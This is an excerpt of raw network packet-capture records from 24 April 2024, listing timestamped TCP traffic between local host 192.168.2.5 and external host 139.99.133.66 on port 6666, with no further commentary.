                                  Apr 24, 2024 17:04:10.007843971 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007883072 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007936001 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007951975 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007987976 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008032084 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.008057117 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008094072 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008136034 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.008148909 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008188009 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008233070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.008265972 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008341074 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008394957 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.008446932 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008516073 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008553982 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008562088 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.008593082 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008629084 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008641958 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.008733988 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.008775949 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.053261995 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.053318977 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.053359985 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.053414106 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.108516932 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.367726088 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.367773056 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.367836952 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.367949963 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368036032 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368158102 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.368204117 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368242979 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368282080 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368305922 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.368376970 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368448973 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.368469954 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368540049 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368614912 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.368643999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368684053 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368721008 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368745089 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.368812084 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.368865013 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.368901014 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369007111 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369070053 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.369108915 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369163990 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369219065 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.369286060 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369323015 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369383097 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.369510889 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369585037 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369658947 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.369699955 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369739056 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369786024 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369802952 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.369837999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369894981 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.369927883 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.369963884 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370019913 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.370055914 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370130062 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370166063 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370187998 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.370254040 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370290995 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370312929 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.370352030 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370404005 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.370439053 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370539904 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.370592117 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.414484978 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.414525986 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.414596081 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.469537973 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.514782906 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.729233027 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729259968 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729278088 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729298115 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729319096 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729337931 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729389906 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729485035 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729517937 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.729517937 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.729542017 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.729562044 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729614973 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729659081 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.729676008 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729763985 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729810953 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.729837894 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729918003 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.729967117 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.730144978 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730206966 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730247974 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.730282068 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730334044 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730375051 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.730407000 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730458975 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730504990 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.730792999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730860949 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.730906963 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.730976105 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731062889 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731101036 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.731134892 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731250048 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731292009 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.731327057 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731400013 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731441021 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.731473923 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731553078 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731597900 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.731631994 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731738091 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731786966 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.731806040 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731890917 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.731935024 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.732038975 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.732076883 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.732131004 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.775664091 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.775722027 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.775893927 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.875914097 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.920999050 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.090435982 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090492010 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090529919 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090569019 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090600967 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.090637922 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.090668917 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090708017 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090744972 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090771914 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.090862989 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090900898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.090956926 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091314077 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091352940 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091379881 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091417074 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091454029 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091479063 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091514111 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091562033 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091577053 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091612101 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091654062 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091684103 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091713905 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091762066 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091787100 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091830969 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091869116 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091890097 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091924906 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091960907 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091980934 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092015982 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092071056 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092145920 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092216969 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092253923 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092292070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092328072 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092381001 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092395067 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092428923 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092483997 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092519999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092557907 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092593908 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092624903 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092654943 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092720985 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.093069077 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.093108892 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.093167067 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.137053013 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.137094021 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.137269974 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.282120943 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.327228069 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.451952934 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.451977968 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.451996088 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452028990 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452110052 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452147007 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452313900 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452332973 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452349901 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452368975 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452395916 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452419043 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452855110 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452893972 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452935934 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452958107 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453001022 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453042030 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453155041 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453265905 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453325033 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453435898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453512907 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453557968 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453722000 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453773022 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453819990 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453844070 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453916073 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453960896 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454468012 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454546928 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454613924 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454627991 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454720020 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454739094 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454756975 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454768896 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454788923 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454799891 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454817057 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454859972 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454874992 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454893112 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454931974 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454965115 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455008030 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455044985 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.455075979 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455125093 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455163002 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.455180883 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455255985 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455297947 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.498475075 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.498528004 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.498588085 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.688354969 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.733464956 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813220024 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813246965 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813266993 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813285112 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813312054 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813324928 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813337088 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813357115 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813378096 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813396931 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813407898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813448906 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813536882 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813597918 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813638926 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813657999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813676119 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813720942 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813996077 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814013958 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814063072 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.814105988 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814156055 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814202070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.814512014 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814531088 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814574957 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.814666033 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814693928 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814743042 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815251112 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815268993 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815346956 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815488100 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815507889 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815525055 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815541983 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815568924 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815583944 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815597057 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815614939 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815654993 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815679073 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815696955 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815715075 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815737009 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815747023 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815787077 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815794945 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815810919 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815850019 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815948009 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815983057 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.816029072 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.859643936 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.859685898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.859745026 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.094810963 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.139744043 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.174961090 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.175064087 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.175122023 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.200259924 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.605875015 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.606017113 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.012582064 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.034993887 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035141945 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035176992 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035209894 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035268068 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035314083 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035327911 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035397053 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035435915 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035445929 CEST666649704139.99.133.66192.168.2.5
